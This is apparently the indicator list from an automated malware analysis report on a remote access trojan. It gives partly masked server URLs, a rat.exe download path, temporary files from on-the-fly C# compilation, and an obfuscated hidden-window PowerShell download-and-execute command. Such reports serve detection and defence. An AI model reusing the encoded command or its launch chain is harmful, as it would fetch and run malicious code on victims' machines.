Technical Information
- http://14#.##.80.151:2220/login
- <SYSTEM32>\rundll32.exe
- %TEMP%\gx4rl6vw.0.cs
- %TEMP%\gx4rl6vw.cmdline
- %TEMP%\gx4rl6vw.out
- %TEMP%\csc956b.tmp
- %TEMP%\res957c.tmp
- %TEMP%\gx4rl6vw.dll
- %TEMP%\res957c.tmp
- %TEMP%\csc956b.tmp
- %TEMP%\gx4rl6vw.cmdline
- %TEMP%\gx4rl6vw.pdb
- %TEMP%\gx4rl6vw.0.cs
- %TEMP%\gx4rl6vw.dll
- %TEMP%\gx4rl6vw.out
- '14#.#8.80.151':2220
- http://14#.##.80.151:2220/login via 14#.#8.80.151
- http://0x###25097:2220/r
- http://14#.##.80.151:2220/bin/rat.exe via 14#.#8.80.151
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gx4rl6vw.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES957C.tmp" "%TEMP%\CSC956B.tmp"' (with hidden window)
- '<SYSTEM32>\rundll32.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -w 1 -e aQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADQAMQA...
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gx4rl6vw.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES957C.tmp" "%TEMP%\CSC956B.tmp"